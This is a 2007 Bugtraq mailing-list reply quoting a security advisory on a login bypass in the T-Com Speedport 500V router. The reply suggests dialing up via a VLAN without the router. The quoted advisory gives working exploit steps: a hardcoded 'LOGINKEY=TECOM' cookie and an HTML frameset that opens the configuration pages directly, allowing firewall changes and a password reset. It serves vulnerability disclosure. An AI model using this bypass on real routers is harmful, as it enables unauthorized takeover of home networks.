[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <45B4AF80.2090305@yospot.de>
Date: Mon, 22 Jan 2007 13:35:12 +0100
From: "security@...pot.de" <security@...pot.de>
Cc: bugtraq@...urityfocus.com
Subject: Re: Virginity Security Advisory 2007-001 : T-Com Speedport 500V Login
bypass
Since this is not the first security problem on this router, and
Deutsche Telekom really does not care,
I advice everyone to use alternative means of routing / dialing up. The
modem shipped in conjunction with
this router requires VLAN support. Dialup requests will only be served
on VLAN.7
More information can be found on man-wiki, althought it deals with the
700V, which has the same security problems, it also applies to the 500V
version.
<a
href="http://man-wiki.net/index.php/T-Home_IPTV_without_speedport_W_700V">man-wiki</a>
and
<a
href="http://man-wiki.net/index.php/T-Home_IPTV_over_wireless_bridge">man-wiki</a>
On Linux a "vconfig add eth0 7" will allow you to dial up without the
Speedport 500V
Regards,
<a href="http://www.mohammadkhani.eu/">Amir Mohammadkhani</a>
advisory07@...p.ru schrieb:
> - - - --------------------------------------------------------------------
> Virginity Security Advisory 2007-001
> - - - --------------------------------------------------------------------
> DATE : 2007-01-19 15:32 GMT
> TYPE : remote
> VERSIONS AFFECTED : T-Com Speedport 500V Firmware 1.31
> AUTHOR : Virginity
> ADVISORY NUMBER : 005
> - - - --------------------------------------------------------------------
>
>
> Description:
>
> The Speedport 500V is a broadband-router which is sold in germany along
> with ADSL lines. (just so you know)
>
> The system is stupid and verifies wether you have entered the correct
> password by setting a cookie with the content LOGINKEY=TECOM
> (this is hardcoded and can not be changed)
> If an attacker simply creates this cookie he can bypass password
> authentication by simply calling the configuration html sites directly.
>
> The attacker then has nearly full system access (you cannot change the
> system password without knowing the old one) and can change system
> configuration e.g. disable the firewall. You can also perform a firmware
> upgrade, which allows you to reset the password to the default one, which
> now gives you full system access.
>
> Vendor has not been notified. I don't think they care^^.
>
> - - - --------------------------------------------------------------------
>
>
> Example:
>
> Create a cookie like this:
>
> Name: LOGINKEY
> Content: TECOM
> Host: <ipaddress> <- replace this by your routers ipaddress ;)
> Path: /
> Expires: Never
>
> create a html page like this and open it in your browser:
>
> <html>
> <frameset rows="44,*" border=0 frameborder=0 framespacing=0">
> <frame src="http://<ipaddress>/b_banner.htm" name="banner">
> <frameset cols="170,*" border=0 frameborder=0 framespacing=0>
> <frame src="http://<ipaddress>/m_startseite.htm" name="menu">
> <frame src="http://<ipaddress>/hcti_startseite.htm" name="hcti">
> </frameset>
> </frameset>
> </html>
>
> this will bypass the login screen and lead you directly to configuration
> menu.
>
> - - - --------------------------------------------------------------------
>
>
> Workaround:
>
> Download the Sourcecode from the vendor (GPL), replace TECOM with something
> else, try bulding it, and then try installing it on the hardware.
> i did not try this. its stupid and does not really solve the problem.
>
> - - - --------------------------------------------------------------------
>
>
> Personal note:
>
> Still here... sadly not dead yet. maybe i should hack the NSA so they kill
> me? *lol* guess i'd have to learn some real things.... greetz to s.
> and that other admin.
>
> - - - --------------------------------------------------------------------
>
Powered by blists - more mailing lists